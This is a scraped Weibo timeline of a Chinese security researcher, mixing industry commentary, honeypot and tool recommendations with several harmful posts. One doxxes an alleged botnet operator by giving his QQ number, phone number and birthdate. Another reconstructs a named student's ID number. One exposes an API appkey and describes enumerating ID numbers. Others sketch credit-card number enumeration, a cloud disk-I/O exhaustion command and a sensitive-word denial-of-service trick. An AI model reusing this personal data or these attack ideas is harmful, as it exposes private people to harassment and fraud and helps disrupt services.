安全是个整体,组成的个体水平不提高,这工作就难做了。乌云名言:安全是一个整体,保证安全不在于强大的地方有多强大,而在于真正薄弱的地方在哪里。
@ringzero: 解决企业的安全威胁还是要从「提升开发人员的安全能力」入手,到新公司一个多月,天天吊打开发和业务,你永远都想不通某个服务为什么会突然冒出一个漏洞。不从根源解决问题的话,会把自己陷入进一个累死的循环。发现漏洞再解决漏洞的方法,得到的效果微乎其微,不是一条好路。 ​​​

21

3

10

ringzero

2017-02-09 来自 微博 weibo.com

解决企业的安全威胁还是要从「提升开发人员的安全能力」入手,到新公司一个多月,天天吊打开发和业务,你永远都想不通某个服务为什么会突然冒出一个漏洞。不从根源解决问题的话,会把自己陷入进一个累死的循环。发现漏洞再解决漏洞的方法,得到的效果微乎其微,不是一条好路。 ​​​

68

21

25

ringzero

2017-02-08 来自 微博 weibo.com

住在大马路边,为了能够专心致志的思考,于是让太太去买个安静的房子。
@子柳: 大佬们都在讲述工匠精神,于是我找了一本叫做《匠人如神》的书,这本书基本上就是本田宗一郎的“微博集锦”,一页一个小思考,很多内容写的都充满了人情味,尤其是这个买拉面的故事太好玩了。 ​​​

转发

3

8

ringzero

2017-02-03 来自 微博 weibo.com

遥想当年:初中生利用漏洞侵入天河一号。//@响马: 给跪//@释子:天河一代就已经能够运算出量子力学了。不是所有计算机都可以的,在暗网有很多超链接是打不开的,只有这么牛逼的计算机才能做到,它可以隐藏或者寻找到更加绝密的信息。也能捍卫国防网络安全。无论怎么跳板,它都能追踪到黑客的位置
@人民日报: 【我国首台千万亿次超级计算机“天河一号”处于饱和运行状态】据新华社日前从国家超级计算天津中心获得的消息,部署在该中心的中国首台千万亿次超级计算机“天河一号”每天在线任务量已超1400个,处于饱和运行状态,这是欧美国家级超算中心都很难达到的一个业务规模。我国首台千万亿次超级计算机“天河一号”处于饱和运行状态 ​​​

7

8

12

ringzero

2017-01-21 来自 微博 weibo.com

网络黑客锁数据敲诈勒索一直就存在,锁开机密码,锁硬盘文件,到现在的MangoDB/Elasticsearch,本质和技术上都还是那点事。但是不知道怎么的,从最近安全媒体们「狼来了」的马后炮观点来看,俨然犯罪分子成为了你们宣传自己的衣食父母。 ​​​

8

5

19

ringzero

2017-01-14 来自 微博 weibo.com

云计算最怕的攻击,估计就是挖掘机了,一铲下去,没有光纤吃得消。 ​​​

16

9

50

ringzero

2017-01-11 来自 微博 weibo.com

喝咖啡加糖,喝红酒兑雪碧、喝白兰地兑冰红茶,没故事的人一般都这么喝。 ​​​

22

34

28

ringzero

2017-01-10 来自 微博 weibo.com

搭车找懂WEB安全原理,还能用Python写漏洞EXP、做网页Crawler的同学。
抱歉,此微博已被作者删除。查看帮助:http://t.cn/Rfd3rQV

9

11

11

ringzero

2017-01-07 来自 微博 weibo.com

自己做指纹识别觉得很累的话,可以截个胡。ping.wappalyzer.com 127.0.0.1 ​​​

25

4

24

ringzero

2017-01-05 来自 微博 weibo.com

//@呆子不开口: 网页链接 这是《我的通行你的证》的最新文字版,不喜欢看PPT的可以看看 。这是我刚恢复的博客,部署在farbox上,模板我自己改了一些,我觉得很酷。里面把自己散在各处的东西都放到一起了
@呆子不开口: 几个月前帮朋友讲了个账号安全相关的议题,比以前在csdn上讲的多了一些新案例,有兴趣的可以在平安夜看看这个ppt,点链接系列大多案例都在里面 网页链接 ​​​

34

1

14

ringzero

2017-01-05 来自 微博 weibo.com

随着国内安全的政策化,今天想到一个非常有威力的拒绝服务攻击手段。只要目标网站和APP支持让用户输入内容的地方,你自动的给系统提交那些最敏感的「敏感词」。不出几天,网站就访问不了了,管理员、系统运营人员也被请去喝茶了。 ​​​

348

70

49

ringzero

2017-01-04 来自 微博 weibo.com

国内安全环境变得越发的政策化,职业未来变得难以捉摸,想安静搞点技术研究的,简历走起来「ringzero[at]aliyun.com」( 安全开发研究、数据挖掘 ) ​​​

52

34

67

ringzero

2016-12-29 来自 微博 weibo.com

提供HTTP/HTTPS/Socks5代理服务器, 并可以将网络请求记录保存到后台数据库,帮助安全测试人员更加便捷的发现(客户端/APP/网页)中隐藏的接口或资源。更新日志:支持最新的MITMProxy 0.18.2,并且解决了内存增长的问题,使用起来更加稳定。网页链接 ​​​

30

12

24

ringzero

2016-12-29 来自 微博 weibo.com

mitmproxy官方已经不再支持python2,而且开启了1.0分支,python3的世界要来了。网页链接 ​​​

3

9

19

ringzero

2016-12-28 来自 微博 weibo.com

PHDays的一个议题,通过大规模构建存在漏洞的蜜罐来监控DDoS,为保护真实的网络场景提供数据支撑。网页链接 ​​​

23

1

14

ringzero

2016-12-25 来自 微博 weibo.com

国内的电视盒,一眼望去全是基于安卓的,然后由于国情,都不敢内置电视直播的应用「触动国企利益」,导致这方面的安全生态特别的乱。盒子的官方论坛都置顶推荐用户安装第三方的应用来观看直播电视,然后你懂的,第三方根本没在信息安全方面做投入。 ​​​

17

15

29

ringzero

2016-12-16 来自 微博 weibo.com

一个圈子的水平,取决于核心维护者的最高水平,如果仅仅是为了凑数字的话,很容易就可以找到上千白帽子填满一个群。大家看着圈子分享的内容,感受彼此的节奏,最后产生认同就留下,不认同直接退出,这是一个双向选择的过程。
@ringzero: 在小密圈创建了一个高门槛的「渗透测试」圈子,对「普通白帽子」以上级别的朋友没有门槛,可被邀请进入。这个圈子没有广告、没有沙龙活动、没有产品发布会、没有邀请盛典、没有各种刷屏,只有纯粹的技术分享交流。 ​​​

5

16

12

ringzero

2016-12-14 来自 微博 weibo.com

作为一个资质不那么差的人,用20%的时间完成一个细分方向80%的基础技能训练,这不过分吧?在一个细分方向钻研一年,达到著名专家能力的一半(50%),这也不过分吧?真正难的是最后90分到100分的提升!前面放了水,你们看不出来?只要求你从0分到50分。
@ringzero: 如果你在一个新的方向上钻研了一年,还没成为高手「这个方向上最著名专家的能力 / 2」,你可能需要考虑远离这个方向了。当然,更别扯什么将来把这个方向当做职业。 ​​​

24

16

18

ringzero

2016-12-14 来自 微博 weibo.com

如果你在一个新的方向上钻研了一年,还没成为高手「这个方向上最著名专家的能力 / 2」,你可能需要考虑远离这个方向了。当然,更别扯什么将来把这个方向当做职业。 ​​​

62

47

27

ringzero

2016-12-13 来自 微博 weibo.com

齐天大圣,来嘞,有点意思。 ​​​

8

12

29

ringzero

2016-12-12 来自 微博 weibo.com

政府对居民身份信息的极度渴求,互联网企业对用户联系信息的极度渴求,导致他们疯狂的、绞尽脑汁的、费尽心思的想从用户那里收集数据。但是他们在收集信息时,却从不会告诉你,采集信息是依据哪些法律法规,这些信息会被用于哪里,采用什么样的保密方法来保障信息安全。他们有能力保护信息的安全吗? ​​​

76

24

35

ringzero

2016-12-12 来自 微博 weibo.com

单一无关联的数据泄露不可怕,最可怕的事情是你在不同地方的数据被汇总到一起,并且用于计算,也就是被「人物画像」。这将计算出整个人的生活轨迹,到这种状况才是毫无隐私可言。难怪现在连买个手机卡、住个酒店、去网吧上网都需要身份证,原来这就是某些部门想要的效果。
抱歉,此微博已被作者删除。查看帮助:http://t.cn/Rfd3rQV

81

11

12

ringzero

2016-12-12 来自 微博 weibo.com

从第一列的标题来看,最核心的组织内部都出现了内鬼。
@鞭牛士: 【南都记者调查:700元买到同事全套信息】近日,南都记者花费700元在网上买到了同事的开房记录、乘坐航班、手机定位等十几项记录。此外,南都记者调查中发现,部分交易通过第三方网站等服务提供担保,整个交易已跃升到“平台化”地步。 ​​​

20

6

5

ringzero

2016-12-12 来自 微博 weibo.com

安全架构师表示:已经很长一段时间的技术部门例会,CTO都没有再叫上我。
@呆子不开口: 关于密码存储的文章,中文的文章我搜了几个看了下,写的好的基本都是开发写的。国内安全圈挖漏洞的太多了,安全架构师太少了,安全产品太多了,安全架构师太少了。当然也可能是因为整体安全意识太差了,所以安全架构师太少了,所以安全产品就多了,因为安全产品太多了,所以也不需要安全架构师了 ​​​

7

3

13

ringzero

2016-12-11 来自 手机微博触屏版

Repost
@ringzero: 《隐私,信息以及信息安全》一份数据,一旦流传进公共领域,将无法被撤回或销毁。互联状况下,应该默认凡是以数字化形式存在的数据,都早晚会进入公共领域,即泄密。医生认为生死是自然规律,而普通人则觉得要避讳。人们对于自己越不了解的事情,越喜欢表现出来天然正义的样子。网页链接 ​​​

19

4

9

ringzero

2016-12-09 来自 微博 weibo.com

在浩如烟海的知识里,懂得分类、设置规则来过滤信息,就是节约生命。 ​​​

24

18

53

ringzero

2016-12-09 来自 微博 weibo.com

对无线Hack和硬件安全产生了浓厚的兴趣,但是却没有时间去深入消化。 ​​​

14

24

36

ringzero

2016-12-07 来自 微博 weibo.com

学习笔记收藏居多总结太少,技术知识阅读居多整理太少,
微信聊天表情居多互动太少,微博口水愤青居多思想太少,
开会发言沉默居多微笑太少。-- 2016年总结 ​​​

9

12

64

ringzero

2016-12-06 来自 微博 weibo.com

在小密圈创建了一个高门槛的「渗透测试」圈子,对「普通白帽子」以上级别的朋友没有门槛,可被邀请进入。这个圈子没有广告、没有沙龙活动、没有产品发布会、没有邀请盛典、没有各种刷屏,只有纯粹的技术分享交流。 ​​​

41

127

56

ringzero

2016-12-06 来自 微博 weibo.com

没想到,我大星巴克的刷卡小票,也是这个样子。接下来,需要找到一个能够穷举卡号有效性的接口(比如说:给每个信用卡还款1分钱,或者根据某些接口的友好返回提示)。 ​​​

10

15

11

ringzero

2016-12-06 来自 微博 weibo.com

信用卡支付凭条的打码,最应该隐藏的应该是后8位,如下图这张凭条,只有4位银行卡号需要被算法穷举,校验码被泄露后,概率更是加倍。而且姓名、过期时间、发卡行、城市都被明文暴露。 ​​​

18

15

31

ringzero

2016-12-06 来自 微博 weibo.com

16位长度的信用卡:发卡行标识代码{6位} + 省级发卡行识别号{2位} + 银行账户{7位} + 校验码{1位},检验码由Luhn算法生成。 ​​​

137

12

50

ringzero

2016-12-01 来自 微博 weibo.com

培训市场的讲师们,都推荐使用第二种方法来做动态方法调用。接下来,你只需要绕过method方法的单引号、双引号转义,把沙盒绕过,命令执行的那套东西拼进去,就是一个远程命令执行了。
@ringzero: 比如说:struts2框架允许开发者进行动态方法调用,提供了两种办法。1、struts.enable.DynamicMethodInvocation,配置文件设置属性为True。2、<action name="some_*" method="{1}"设置通配符,这个方法无视配置文件。然后重点来了,第一个方法已经被人提出是个高危漏洞,并申请了CVE编号2016-3081。 ​​​

6

1

4

ringzero

2016-12-01 来自 微博 weibo.com

比如说:struts2框架允许开发者进行动态方法调用,提供了两种办法。1、struts.enable.DynamicMethodInvocation,配置文件设置属性为True。2、<action name="some_*" method="{1}"设置通配符,这个方法无视配置文件。然后重点来了,第一个方法已经被人提出是个高危漏洞,并申请了CVE编号2016-3081。 ​​​

9

5

10

ringzero

2016-12-01 来自 微博 weibo.com

Java领域真是一块还未完全开垦的安全技术荒地,表面望眼过去,搞安全研究的人扎堆,但他们都只是把大量的精力投入到了「语言自身的安全」,而忽略了成就Java语言榜首地位背后的原因(海量的J2EE企业级开源框架)。现在的Java培训班,他们讲Java都不是主讲语言,而是怎么使用知名框架「SSH、SSM」。 ​​​

29

13

22

ringzero

2016-12-01 来自 微博 weibo.com

一个脚本小子想独自开车去远方,寻找理想成为探险家,却因为某些偏见,把自己大量的时间花费在了「怎么造车轮子」上面。 ​​​

11

12

38

ringzero

2016-11-30 来自 微博 weibo.com

看了一下DNS邮件SPF记录的语法,支持多个Mechanism,支持Include、PTR、Redirect等语法,要是域名的注册成本接近免费,找到足够多的SMTP服务器,这里面可以放射出很大的风暴能量。 ​​​

4

2

6

ringzero

2016-11-30 来自 微博 weibo.com

两年前,用ZMap扫描互联网开放的ntp服务器,有几十万台,现在只剩下那渺渺的4万台了。ElasticSearch出现命令执行漏洞的时候,互联网还能见到开放个几万台服务器,等到乌云平台的曝光后,出现了「研究的人比存在漏洞的服务器还多」的状况。最后,这些漏洞自然无法被「别有用心的人」利用了。
@ringzero: 解放黑客,让他们处于活跃状态,反而能使黑暗力量趋向最小值。譬如说NTP反射DDOS的初期,资源都被掌握在一小撮人的手里,导致这股力量异常的强大,打向哪里,哪里都要崩溃。当相关技术被公开后,研究这个的人一多,互联网上可被利用的黑暗资源直线骤降,威胁自动解除。 ​​​

17

11

16

ringzero

2016-11-30 来自 微博 weibo.com

解放黑客,让他们处于活跃状态,反而能使黑暗力量趋向最小值。譬如说NTP反射DDOS的初期,资源都被掌握在一小撮人的手里,导致这股力量异常的强大,打向哪里,哪里都要崩溃。当相关技术被公开后,研究这个的人一多,互联网上可被利用的黑暗资源直线骤降,威胁自动解除。 ​​​

49

16

28

ringzero

2016-11-30 来自 微博 weibo.com

搞深度学习还是要用最好用的平台 MXNet。
@phunter_lau: 尝试在知乎开个专栏,两分钟深度学习demo,讲几个知识点。写作时间半小时阅读时间两分钟,用知识点结合实际代码的方式,有兴趣的观众按照参考文献继续探索。这是一个尝试。两分钟demo:强化学习玩Flappy bird - 两分钟深度学习demo(分享自 @知乎 专栏 · 作者:@phunter_lau网页链接 ​​​

4

3

4

ringzero

2016-11-29 来自 微博 weibo.com

在北京、上海、深圳、香港各租一台VPS,部署上SSH、Redis、Tomcat、MSSQL蜜罐,就等搞DDOS的上门送攻击样本了,似乎已经闻到已烤熟的肉鸡香味。 ​​​

15

13

58

ringzero

2016-11-29 来自 微博 weibo.com

Awesome Honeypots 网页链接 你总能找到一款适合自己二次开发的项目。
@ringzero: 一个高交互的SSH蜜罐项目,Go语言实现。网页链接 ​​​

33

2

13

ringzero

2016-11-29 来自 微博 weibo.com

一个高交互的SSH蜜罐项目,Go语言实现。网页链接 ​​​

52

3

14

ringzero

2016-11-29 来自 微博 weibo.com

QQ:531101669,此人是职业玩Botnet的,很多人逆向到他了,只是拿他没办法。zhimingge.in CVE-2015-1427 attacker 网页链接 网页链接 网页链接 ​​​

15

14

16

ringzero

2016-11-28 来自 微博 weibo.com

这个DDOS阵地的主人QQ:531101669,手机号:13952681011,出生年月日:1991-10-25
@李卓桓: 现在扫描简单密码入侵主机好像很流行。前些天刚设好个VPS密码设了123456很快被黑。今天我的一个非标准ssh端口Docker Container竟然也被黑了,因为随手设了个test/test的账号。黑客来自上海移动117.135.160.10,下载并启动了一个叫做508的程序连接到23.244.35.8:26002通讯,然后就跑了。截图留念。 ​​​

67

22

32

ringzero

2016-11-28 来自 微博 weibo.com

随手在Google一搜ntpamp.txt,被吓到。DDOS的傻瓜化程度已经低成这样了,你们安全圈就拿搞DDOS的一点辙都没有吗? ​​​

30

15

22

ringzero

2016-11-28 来自 微博 weibo.com

HFS, 直接怼翻他。117.21.191.201:9090 ,根目录下的ntpamp.txt,4万多NTP反射的服务器,一看就是搞DDOS的,@梁斌penny 梁博拿去。 //@高春辉: [doge][doge][doge]
@李卓桓: 现在扫描简单密码入侵主机好像很流行。前些天刚设好个VPS密码设了123456很快被黑。今天我的一个非标准ssh端口Docker Container竟然也被黑了,因为随手设了个test/test的账号。黑客来自上海移动117.135.160.10,下载并启动了一个叫做508的程序连接到23.244.35.8:26002通讯,然后就跑了。截图留念。 ​​​

47

10

13

ringzero

2016-11-28 来自 微博 weibo.com

我见识试用过的蜜罐中「高交互、轻量级」,最好的是 - ThreatKey。用户可以在自己的生产网络中,使用Docker灵活的部署各种高度定制过的蜜罐环境,蜜罐系统会通过API自动上传威胁日志到集中控制台「查询、统计、分析」,最后生成可视化报告。网页链接 ​​​

63

12

25

ringzero

2016-11-28 来自 微博 weibo.com

蜜罐产品总管是乌云知识库的大当家瞌睡龙 网页链接 //@secdragon: [喵喵]
@乌云知识库: 同事最近花时间优化了内部蜜罐的交互,他告诉我他只是单纯的想满足用户的需求。 ​​​

5

3

10

ringzero

2016-11-26 来自 微博 weibo.com

最近一段时间,想实现需求,都懒得自己动手写代码了,都是直接上Github搜索Stars>5000的项目,然后从优秀的项目里面抠出具体的实现代码,派生出自己熟悉的类库。通过拼装优秀代码,实现了生产力的快速提升,譬如说,从SS的go版本中,学习怎么用go语言实现Socks5 Proxy Server 网页链接 ​​​

114

19

48

ringzero

2016-11-25 来自 微博 weibo.com

经过测试,一个HTTP Request从发起请求到完成,最耗时的短板在DNS解析上,优化之后,不必要的等待时间大大缩短。
@ringzero: 多并发网络请求场景下的爬虫、扫描器,有一个立竿见影的优化技巧,定制系统的DNS配置文件/etc/resolv.conf
options timeout:1 attempts:1 rotate
nameserver 114.114.114.114
nameserver 119.29.29.29
nameserver 223.5.5.5
Timeout:超时时间, attempts:轮训列表的次数, rotate:从列表随机选取。 ​​​

54

12

20

ringzero

2016-11-25 来自 微博 weibo.com

多并发网络请求场景下的爬虫、扫描器,有一个立竿见影的优化技巧,定制系统的DNS配置文件/etc/resolv.conf
options timeout:1 attempts:1 rotate
nameserver 114.114.114.114
nameserver 119.29.29.29
nameserver 223.5.5.5
Timeout:超时时间, attempts:轮训列表的次数, rotate:从列表随机选取。 ​​​

86

13

33

ringzero

2016-11-25 来自 微博 weibo.com

浏览器自动代理配置,PAC(Proxy Auto Config File)是一个JavaScript文件,可以在这个文件上面做很多事情,提升自动化安全测试中,代理服务器的流量抓取性能。譬如说:判断请求的文件类型、扩展名,聚类一个已经采集过的URL列表,如果命中,流量就不发往代理服务器了,直接DIRECT。 ​​​

24

7

22

ringzero

2016-11-24 来自 微博 weibo.com

解决了,调用chrome.debugger的api, 跟踪处理Network.requestWillBeSent,Network.responseReceived这两个类型的消息,做成一个浏览器插件。网页链接
@ringzero: Chrome的开发者工具,怎么将Network的网络数据包请求保存到文件,有研究过的开发者吗?Cookies和History都是SQLite3的数据库,保存在/Google/Chrome/Default目录下,但是达不到要求,如果能够Dump网络调试记录,就能释放更多的生产力了。 ​​​

16

5

19

ringzero

2016-11-24 来自 微博 weibo.com

Chrome 远程调试协议分析与实战,将数据发送到远程服务器,远程调试协议基于 WebSocket,利用 WebSocket 建立连接 DevTools 和浏览器内核的快速数据通道。 网页链接
@ringzero: Chrome的开发者工具,怎么将Network的网络数据包请求保存到文件,有研究过的开发者吗?Cookies和History都是SQLite3的数据库,保存在/Google/Chrome/Default目录下,但是达不到要求,如果能够Dump网络调试记录,就能释放更多的生产力了。 ​​​

15

10

9

ringzero

2016-11-24 来自 微博 weibo.com

Chrome的开发者工具,怎么将Network的网络数据包请求保存到文件,有研究过的开发者吗?Cookies和History都是SQLite3的数据库,保存在/Google/Chrome/Default目录下,但是达不到要求,如果能够Dump网络调试记录,就能释放更多的生产力了。 ​​​

53

19

16

ringzero

2016-11-24 来自 微博 weibo.com

从你本机安装的浏览器上,借用Cookies封装到python脚本环境中,进行二次请求访问。我一直都想实现的想法,能搜索到,就不自己造轮子了。网页链接 ​​​

106

18

23

ringzero

2016-11-21 来自 微博 weibo.com

云计算中的弹性计算,按时付费机制,会导致攻击成本的骤降,最终自食其苦。比如我是一个普通的租户,在云计算提供商那里的一个固定区域申请1000个硬盘实例,然后在每个实例上 dd if=/dev/zero of=test bs=64k count=4k oflag=dsync ,把IO打满,然后风暴就来了。 ​​​

25

15

10

ringzero

2016-11-20 来自 微博 weibo.com

我吃肉才有力气干活,然后你说吃糠便宜,云计算市场的乱象。 ​​​

7

评论

28

ringzero

2016-11-19 来自 微博 weibo.com

Passive DNS : 被动的收集网络中的DNS解析记录,不管是攻击研究还是网络安全防御监控,都很重要。网页链接 ​​​

30

5

14

ringzero

2016-11-19 来自 微博 weibo.com

肚子有货的公司,都会非常开放的,让你能第一时间的试用他们产品。如果连产品试用都不提供,就敢出来说自己多厉害的,那么你也得小心了。
@ringzero: 「威胁情报,态势感知」都只是「数据积累+安全能力」的一种落地形式,如果你发现有人在谈论这两个话题的时候,没有附上数据和实质性的安全能力描述,那就要小心了,这可能是在睁眼说瞎话。还有就是,国内很多公司把自己的扫描器说得天花乱坠,却从来不提技术策略,实现细节,那么你也得小心了。 ​​​

19

5

9

ringzero

2016-11-19 来自 微博 weibo.com

「威胁情报,态势感知」都只是「数据积累+安全能力」的一种落地形式,如果你发现有人在谈论这两个话题的时候,没有附上数据和实质性的安全能力描述,那就要小心了,这可能是在睁眼说瞎话。还有就是,国内很多公司把自己的扫描器说得天花乱坠,却从来不提技术策略,实现细节,那么你也得小心了。 ​​​

39

12

33

ringzero

2016-11-18 来自 微博 weibo.com

美元兑人民币中间价6.8796元,特斯拉说因为汇率要提价了,我好担心MacBook Pro现在不下手的话,会不会也跟着涨价。 ​​​

2

20

10

ringzero

2016-11-17 来自 微博 weibo.com

让你的python脚本灵活的调用各种插件库。网页链接 ​​​

26

3

18

ringzero

2016-11-17 来自 微博 weibo.com

回复@s4turnus: 没有乌云就不会有漏洞。 //@s4turnus:没有黄片就不会有欲望
@ringzero: 系统不开放就不会有安全威胁,
业务不发展就不会有运维事故,
部队不训练就不会有伤亡损失。 ​​​

27

13

15

ringzero

2016-11-17 来自 微博 weibo.com

系统不开放就不会有安全威胁,
业务不发展就不会有运维事故,
部队不训练就不会有伤亡损失。 ​​​

41

14

24

ringzero

2016-11-16 来自 微博 weibo.com

那些说查询要收费的,成本高的,你们的思维太僵化了,而且还喜欢第一时间否定别人说的。appkey=bbefe459287faab66731a970d9c85328 ,还有很多提供实名认证「银行、证券、征信、智能生活」的接口,并没有你想象的安全,他们指望验证码限制重复请求,却不知道机器脚本早就可以做到95%的正确识别率了。 ​​​

139

45

84

ringzero

2016-11-16 来自 微博 weibo.com

身份号的生成算法:6位地址码+8位出生日期码+3位顺序码+1位校验码,其中3位顺序码属于随机生成「顺序码是给同地址码同出生日期码的人编定的顺序号,其中奇数分配给男性,偶数分配给女性」,其它位都是可以通过条件得知。那么,最多发起500个网络请求,就能还原一个身份证号。网页链接 ​​​

360

92

137

ringzero

2016-11-15 来自 微博 weibo.com

通过地址,用算法直接还原了完整的身份号。331002********2037,千万不要让人知道你的出生地和生日。
@性感玉米: 杨佳琦同学,你的身份证落在世博园保利影城这里的恒记冰室奶茶店了……老板是我粉丝……说让我发个微博也给他店带点人气,如果杨同学这条微博帮了你的话记得来JJBOOM.COM买电脑还愿。 ​​​

261

61

64

ringzero

2016-11-15 来自 微博 weibo.com

Facebook为了检查用户是否使用了同样的密码,Facebook公司从黑市购买用户信息,然后用网站上使用的加密密码与其做交叉检查。那么请问,国内是否也可以这样做?是否违法? ​​​

26

20

8

ringzero

2016-11-10 来自 微博 weibo.com

记录系统调用&用户登录成功的日志,可以发现大多数的Windows域渗透行为,常用套路就是执行那几个命令:sc.exe、systeminfo、powershell、ipconfig.exe、schtasks.exe、netstat.exe、netsh.exe、net.exe、psexec.exe、tasklist.exe、wmic、mimikatz、msf套件,以及释放出来的临时文件。 ​​​

40

10

18

ringzero

2016-11-09 来自 微博 weibo.com

经过统计排序后的规则比想象中价值要大,购买了一份Wappalyzer的CMS、WEB FRAMEWORKS、WEB SERVERS的排名数据后,将WEB指纹模块的识别效率提升了1.5倍。网页链接 ​​​

10

2

12

ringzero

2016-11-08 来自 微博 weibo.com

信息安全这个行业,不怎么作为的企业,最大的红利是「政策红利」。而有所作为的企业,他们面对的最大的风险,恰恰却是「政策风险」。 ​​​

39

20

46

ringzero

2016-11-07 来自 微博 weibo.com

Github真是一个搜索付费API Key的好地方,屡试不爽。网页链接 ​​​

24

19

24

ringzero

2016-11-07 来自 微博 weibo.com

要是能换上国家自主研发,通过可信安全认证的芯片,就更加安全了。//@响马: 换颗 cpu 就可以保障安全了?
@Arm官方微博: #新芯知我新#不久前,美国从东海岸的波士顿纽约费城华盛顿,到西海岸的洛杉矶旧金山西雅图,互联网服务全面宕机,从侧面反映出了当今物联网设备的安全性薄弱,无法抵御黑客基本的攻击。不过,ARM新推出了Cortex-M23与Cortex-M33处理器,是首款基于ARMv8-M架构的下一代嵌入式处理器,可有力保障物联网设 ​​​...全文

8

4

4

ringzero

2016-11-06 来自 微博 weibo.com

暴雪将开放分享《星际争霸2》的AI技术,供全世界科学家共同研究开发。而在未来,谷歌DeepMind将针对游戏《星际争霸2》开发新的人工智能。 ​​​

4

4

14

ringzero

2016-11-05 来自 微博 weibo.com

前端框架Semantic-UI 对比 Bootstrap,简直就是高富帅vs屌丝。 ​​​

26

10

15

ringzero

2016-11-05 来自 微博 weibo.com

新增防止SQL注入escape_string(),统计记录条数count(),给喜欢使用原生MySQL,而又能够敏捷开发的Pythoner。网页链接
@ringzero: 一个非常友好的pymysql面向对象操作类(CURD)。网页链接 ​​​

27

6

5

ringzero

2016-11-04 来自 微博 weibo.com

GitLab任意文件读取,又是软连接的锅。网页链接 ​​​

15

2

3

ringzero

2016-11-01 来自 微博 weibo.com

26

6

12

ringzero

2016-11-01 来自 微博 weibo.com

wydomain2 更新发布,这次稳定性绝对有保证。从alexa、chaxunla、ilinks、google、sitedossier、netcraft、threatcrowd、threatminer爬取结果,再与openssl证书+字典穷举结果合并,生成最终的子域名集合。网页链接 ​​​

82

19

38

ringzero

2016-11-01 来自 微博 weibo.com

John Podesta点的那封钓鱼邮件很关键,给了安全从业人员深深的一耳光,防不胜防。骇客实战派 VS CTF派+理论派的差距。
@老赵: 今天WikiLeaks新邮件里又爆出Brazile三月份给女克辩论前露题了。为什么要说又呢?因为之前也爆出过她漏题,但是她跳出来说这是假的,然后今天又被爆了。当时她还是CNN员工,后来去DNC当副主席了,但还在给CNN写内容。今天CNN表示这事儿让他们uncomfortable并断绝与她来往。Brazile同学估计崩溃了: ​​​

7

4

9

ringzero

2016-10-31 来自 微博 weibo.com

类似常用正则表达式大全 网页链接
@ringzero: 互联网上是否有人建立了正则表达式的基础参考库?USERNAME [a-zA-Z0-9._-]+
/ UNIXPATH (/([\w_%!$@:.,+~-]+|\\.)*)+ ,这样干起开发的活来,事半功倍啊。 网页链接 ​​​

82

14

18

ringzero

2016-10-31 来自 微博 weibo.com

互联网上是否有人建立了正则表达式的基础参考库?USERNAME [a-zA-Z0-9._-]+
/ UNIXPATH (/([\w_%!$@:.,+~-]+|\\.)*)+ ,这样干起开发的活来,事半功倍啊。 网页链接 ​​​

105

11

12

ringzero

2016-10-27 来自 微博 weibo.com

花了那么多的钱请的一群什么狗屁安全专家。 ​​​
长图

112

35

33

ringzero

2016-10-26 来自 微博 weibo.com

折腾了好久从网络层handShake还原SSL数据包,结果还不如Webkit从应用层来得简单明了,Casperjs更好用。 phantomjs ./netsniff.js www.aliyun.com Examples : 网页链接 ​​​

7

6

11

ringzero

2016-10-25 来自 微博 weibo.com

前有DirtyCOW打崩所有Linux, 后有Mirai & BotNet打崩了半个美国互联网,今天又来了个能够打崩所有Android的Drammer漏洞,隔三差五的刺激人,这样可不行,明天还是得买点「安全股票」压压惊。 ​​​

6

12

29

ringzero

2016-10-24 来自 微博 weibo.com

Python Selenium 自动化测试实战 网页链接 ​​​

17

13

16

ringzero

2016-10-21 来自 微博 weibo.com

Get ALL URLSchemes
@StackOverflowError: 经常被问某些 app 的 URL Scheme 是什么,写了个 app 来解决这个问题:网页链接 可以在非越狱设备上面获取所有 app 的 Plist 文件,可以查看、复制、以及分享出去。点击 CFBundleURLTypes 可以查看 URL Schemes。本项目全部使用私有 API,需要编译安装到手机上。 ​​​

15

评论

7

ringzero

2016-10-19 来自 微博 weibo.com

今天把Worker Pools加了个功能,插件在发起网络并发请求之前,先模拟得出一个合理的阈值,再限制并发数小于阈值。两个蠢方法,看错误结果集中是否有`connection reset by peer`等等信息,或者统计Timeout的数量。 ​​​

1

6

6

ringzero

2016-10-19 来自 微博 weibo.com

利益斗争双方,借黑客之手披露见不得人的信息,黑客被当枪使。
@西城SQL: 今年#美国大选# 中主流媒体扮演的角色很肮脏。要真相得去求助于黑客[二哈],而媒体千方百计地去掩盖真相。[思考][黑线][黑线] American·Washington King ​​​

3

2

9

ringzero

2016-10-18 来自 微博 weibo.com

这几天玩阴阳师,游戏玩得不怎样,倒是整天在折腾怎么写辅助脚本,自动升级、刷探索,iPad越狱了之后,结果7.1.2的iOS系统开不了游戏,苹果又把9.3.3版本的升级授权关闭了,最后只能参考乌云知识库的文章,弄了个免越狱可运行的触动精灵(按键精灵)。网页链接 ​​​

18

20

38

ringzero

2016-10-10 来自 微博 weibo.com

互联网上很多黑灰产是可被检测的,比如在互联网上部署大量的匿名代理后,从结果集可以看到非常多的账号注册行为(QQ、360、赶集、百度、小米),他们用代理注册这么多账号是想做什么?要是有网络出口给你做流量检测,效果更佳。网页链接 ​​​

35

17

22

ringzero

2016-10-10 来自 微博 weibo.com

昨天看你们那么多人发朋友圈说习大大在《新闻联播》节目里面,喊了很多增强网络空间安全防御能力的口号,我就应该买一买信息安全股的。今天启明星辰积极响应了号召,率先涨停。 ​​​

6

8

21

ringzero

2016-10-09 来自 微博 weibo.com

75

3

17

ringzero

2016-10-09 来自 微博 weibo.com

我在等待 yahoo.thecthulhu.com 的生效,却意外的等来了Dropbox的6867万,真是有意栽花花不开,无心插柳柳成荫。网页链接 ​​​

26

10

18

ringzero

2016-10-09 来自 微博 weibo.com

Google 鼓励所有 CA 将其签发的证书记录到可公开验证、只能增加内容且不可篡改的日志中。透明度报告 Certificate Transparency 网页链接
@ringzero: 又一个收集子域名的好接口:网页链接 ​​​

48

3

11

ringzero

2016-10-09 来自 微博 weibo.com

又一个收集子域名的好接口:网页链接 ​​​

227

14

30

ringzero

2016-10-09 来自 微博 weibo.com

chrome://net-internals/#dns Chrome的DNS缓存时间1分钟
@ringzero: 用Go实现一个协程异步的Socks5服务,本地各种稳定快速,一部署到远程水管VPS上,各种DELAY和FAILED,Chrome & Proxy Switchy默认开启远程DNS解析,这个是最耗时和不稳定的,只能加个Dnsmasq缓存缓解。在爬虫和扫描器的httpClient那块,DNS解析也是造成性能缓慢的通病。 ​​​

6

2

8

ringzero

2016-10-09 来自 微博 weibo.com

